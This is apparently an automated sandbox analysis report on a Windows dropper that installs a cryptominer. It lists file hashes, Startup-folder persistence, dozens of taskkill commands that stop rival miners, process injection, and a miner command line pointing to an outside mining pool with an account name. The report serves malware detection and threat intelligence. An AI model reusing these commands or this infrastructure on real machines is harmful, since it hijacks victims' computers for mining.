Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
13-03-2024 12:34
Static task
static1
Behavioral task
behavioral1
Sample
c5e3045463eec98fb592703d17d764ab.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
c5e3045463eec98fb592703d17d764ab.exe
Resource
win10v2004-20240226-en
General
-
Target
c5e3045463eec98fb592703d17d764ab.exe
-
Size
414KB
-
MD5
c5e3045463eec98fb592703d17d764ab
-
SHA1
f833057e667bb46c9c5760706ff93ef3becfa16f
-
SHA256
e1522348b9a344636d8e3b22a41fec6d78e938ed118a5f4204ffad4ba87536b6
-
SHA512
82372f593276c9017eab00db39b207d03e42dd49a5a46f70d94700ae797c903264dc06c5962b60c2201efb64f37c24fd306506da0aef041b03c7556c68ef1725
-
SSDEEP
12288:IkWAehJuqT6zxyJr9Cw6g0Q+kSDEPhdIJ9WmDjylJ69V:IkWAAuqezIhwPTQq7J9WWjEk9V
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation c5e3045463eec98fb592703d17d764ab.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation newmoon17.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240595843 c5e3045463eec98fb592703d17d764ab.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\newmoon17.exe c5e3045463eec98fb592703d17d764ab.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\newmoon17.exe c5e3045463eec98fb592703d17d764ab.exe -
Executes dropped EXE 5 IoCs
pid Process 640 newmoon17.exe 4776 new.exe 5608 fuckHDZSDP.exe 5832 fuckHDZSDP.exe 5880 fuckHDZSDP.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5608 set thread context of 5832 5608 fuckHDZSDP.exe 135 PID 5832 set thread context of 5880 5832 fuckHDZSDP.exe 136 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 32 IoCs
pid Process 864 taskkill.exe 3044 taskkill.exe 3364 taskkill.exe 3284 taskkill.exe 2860 taskkill.exe 2704 taskkill.exe 2252 taskkill.exe 4828 taskkill.exe 4500 taskkill.exe 4056 taskkill.exe 3064 taskkill.exe 4784 taskkill.exe 4424 taskkill.exe 3932 taskkill.exe 4108 taskkill.exe 628 taskkill.exe 3588 taskkill.exe 2344 taskkill.exe 4372 taskkill.exe 2692 taskkill.exe 1712 taskkill.exe 2456 taskkill.exe 4544 taskkill.exe 1212 taskkill.exe 4952 taskkill.exe 4464 taskkill.exe 880 taskkill.exe 2200 taskkill.exe 3088 taskkill.exe 1700 taskkill.exe 2460 taskkill.exe 2956 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeDebugPrivilege 1712 taskkill.exe Token: SeDebugPrivilege 4424 taskkill.exe Token: SeDebugPrivilege 4464 taskkill.exe Token: SeDebugPrivilege 4784 taskkill.exe Token: SeDebugPrivilege 2956 taskkill.exe Token: SeDebugPrivilege 2860 taskkill.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 1212 taskkill.exe Token: SeDebugPrivilege 4108 taskkill.exe Token: SeDebugPrivilege 2692 taskkill.exe Token: SeDebugPrivilege 2344 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 3044 taskkill.exe Token: SeDebugPrivilege 4500 taskkill.exe Token: SeDebugPrivilege 4544 taskkill.exe Token: SeDebugPrivilege 1700 taskkill.exe Token: SeDebugPrivilege 4952 taskkill.exe Token: SeDebugPrivilege 4056 taskkill.exe Token: SeDebugPrivilege 2200 taskkill.exe Token: SeDebugPrivilege 628 taskkill.exe Token: SeDebugPrivilege 3364 taskkill.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeDebugPrivilege 4828 taskkill.exe Token: SeDebugPrivilege 3932 taskkill.exe Token: SeDebugPrivilege 880 taskkill.exe Token: SeDebugPrivilege 4372 taskkill.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 3284 taskkill.exe Token: SeDebugPrivilege 2704 taskkill.exe Token: SeDebugPrivilege 3064 taskkill.exe Token: SeDebugPrivilege 3088 taskkill.exe Token: SeDebugPrivilege 2252 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 976 wrote to memory of 640 976 c5e3045463eec98fb592703d17d764ab.exe 87 PID 976 wrote to memory of 640 976 c5e3045463eec98fb592703d17d764ab.exe 87 PID 976 wrote to memory of 640 976 c5e3045463eec98fb592703d17d764ab.exe 87 PID 640 wrote to memory of 4776 640 newmoon17.exe 89 PID 640 wrote to memory of 4776 640 newmoon17.exe 89 PID 640 wrote to memory of 4776 640 newmoon17.exe 89 PID 4776 wrote to memory of 4784 4776 new.exe 93 PID 4776 wrote to memory of 4784 4776 new.exe 93 PID 4776 wrote to memory of 4784 4776 new.exe 93 PID 4776 wrote to memory of 1712 4776 new.exe 94 PID 4776 wrote to memory of 1712 4776 new.exe 94 PID 4776 wrote to memory of 1712 4776 new.exe 94 PID 4776 wrote to memory of 3588 4776 new.exe 95 PID 4776 wrote to memory of 3588 4776 new.exe 95 PID 4776 wrote to memory of 3588 4776 new.exe 95 PID 4776 wrote to memory of 2956 4776 new.exe 96 PID 4776 wrote to memory of 2956 4776 new.exe 96 PID 4776 wrote to memory of 2956 4776 new.exe 96 PID 4776 wrote to memory of 2860 4776 new.exe 97 PID 4776 wrote to memory of 2860 4776 new.exe 97 PID 4776 wrote to memory of 2860 4776 new.exe 97 PID 4776 wrote to memory of 4424 4776 new.exe 98 PID 4776 wrote to memory of 4424 4776 new.exe 98 PID 4776 wrote to memory of 4424 4776 new.exe 98 PID 4776 wrote to memory of 4464 4776 new.exe 99 PID 4776 wrote to memory of 4464 4776 new.exe 99 PID 4776 wrote to memory of 4464 4776 new.exe 99 PID 4776 wrote to memory of 4108 4776 new.exe 100 PID 4776 wrote to memory of 4108 4776 new.exe 100 PID 4776 wrote to memory of 4108 4776 new.exe 100 PID 4776 wrote to memory of 628 4776 new.exe 101 PID 4776 wrote to memory of 628 4776 new.exe 101 PID 4776 wrote to memory of 628 4776 new.exe 101 PID 4776 wrote to memory of 1212 4776 new.exe 102 PID 4776 wrote to memory of 1212 4776 new.exe 102 PID 4776 wrote to memory of 1212 4776 new.exe 102 PID 4776 wrote to memory of 4056 4776 new.exe 103 PID 4776 wrote to memory of 4056 4776 new.exe 103 PID 4776 wrote to memory of 4056 4776 new.exe 103 PID 4776 wrote to memory of 2456 4776 new.exe 104 PID 4776 wrote to memory of 2456 4776 new.exe 104 PID 4776 wrote to memory of 2456 4776 new.exe 104 PID 4776 wrote to memory of 1700 4776 new.exe 105 PID 4776 wrote to memory of 1700 4776 new.exe 105 PID 4776 wrote to memory of 1700 4776 new.exe 105 PID 4776 wrote to memory of 3044 4776 new.exe 106 PID 4776 wrote to memory of 3044 4776 new.exe 106 PID 4776 wrote to memory of 3044 4776 new.exe 106 PID 4776 wrote to memory of 4500 4776 new.exe 107 PID 4776 wrote to memory of 4500 4776 new.exe 107 PID 4776 wrote to memory of 4500 4776 new.exe 107 PID 4776 wrote to memory of 4952 4776 new.exe 108 PID 4776 wrote to memory of 4952 4776 new.exe 108 PID 4776 wrote to memory of 4952 4776 new.exe 108 PID 4776 wrote to memory of 4544 4776 new.exe 109 PID 4776 wrote to memory of 4544 4776 new.exe 109 PID 4776 wrote to memory of 4544 4776 new.exe 109 PID 4776 wrote to memory of 4828 4776 new.exe 110 PID 4776 wrote to memory of 4828 4776 new.exe 110 PID 4776 wrote to memory of 4828 4776 new.exe 110 PID 4776 wrote to memory of 864 4776 new.exe 111 PID 4776 wrote to memory of 864 4776 new.exe 111 PID 4776 wrote to memory of 864 4776 new.exe 111 PID 4776 wrote to memory of 2252 4776 new.exe 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5e3045463eec98fb592703d17d764ab.exe"C:\Users\Admin\AppData\Local\Temp\c5e3045463eec98fb592703d17d764ab.exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\Start Menu\Programs\Startup\newmoon17.exe"C:\Users\Admin\Start Menu\Programs\Startup\newmoon17.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Users\Admin\AppData\Roaming\kakao3\new.exe"C:\Users\Admin\AppData\Roaming\kakao3\new.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CMD.EXE4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM x30811.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM cgminer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svchoost.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mamatije.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mamatije2.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mamatije3.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM yaaa3.2.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM WinMine.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mamatije4.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mamatije5.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM mamatije6.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM taker.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM install-1.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM install-0.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM tasker.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM start.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM start0.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM hahahahaha.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM wuT.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM wuT2.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM wuT3.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM wuT4.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM NoRisk.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM NoRisk2.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM gagajeje.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM marica.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM hmm3.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM hula.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM official27.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ev0ga.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM fuckHDZSDP.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
C:\Users\Admin\AppData\Roaming\kakao3\fuckHDZSDP.exefuckHDZSDP.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5608 -
C:\Users\Admin\AppData\Roaming\kakao3\fuckHDZSDP.exefuckHDZSDP.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5832 -
C:\Users\Admin\AppData\Roaming\kakao3\fuckHDZSDP.exemine.exe -a 59 -o http://hdzx.aquarium-stakany.org:8332/ -u darkSons_crypt -p pt6⤵
- Executes dropped EXE
PID:5880
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
359KB
MD51ce65c3c14f7f09c08c50fbb6a8c1cc4
SHA146e4fd565736ff96a94f5b762c1f875c32585a1b
SHA2564d588c0d12120e17bb7ab0505f546f9ef1144bce7fabb7e1dda98b2b7a0d78db
SHA512735d13e914c9242add4f07aa0fb2da1e605f335f9cd5f94eb2ceb280ba723fc11074c9cef0d4824fb1cda60e4c806507689e5626b4fb0aae9e8fe0f4dcb557d5
-
Filesize
272KB
MD5ae9c07d9b2ea9c1f58e32d3c44b0f33e
SHA1e1e72ae01919bc8f0bd236aa00eed4d029c7cce7
SHA256cf1372ef80717e2458c97b778e5121e7b8f590004dec90581947e6afb6ec8cb2
SHA5126de04c9d8e057de2da54bbb5f518f5534d30a7bdcf40af93808ae4f31f5b3e1d748764e87af064a18e0734e1d2ef1b153bd267dfa85b6b872e653b5206b3368a
-
Filesize
56KB
MD5c31027010355fd8f52fe3640048acd37
SHA15dd50d63d76b8e1cefbc019cfd414c57fffeaa72
SHA25682bd6f72c10c1c492c019ec1528c5737e08d112aa63bf0ab57dead223d7f9286
SHA51256a74030e2d3f61cd3b2675ecf366dd005830723bbb3ff46cea3dd7f283f0791f5782ba29d2d0bb8d3778e1cdebb3c96da5269f9d5b64febbf659ec65a8b609e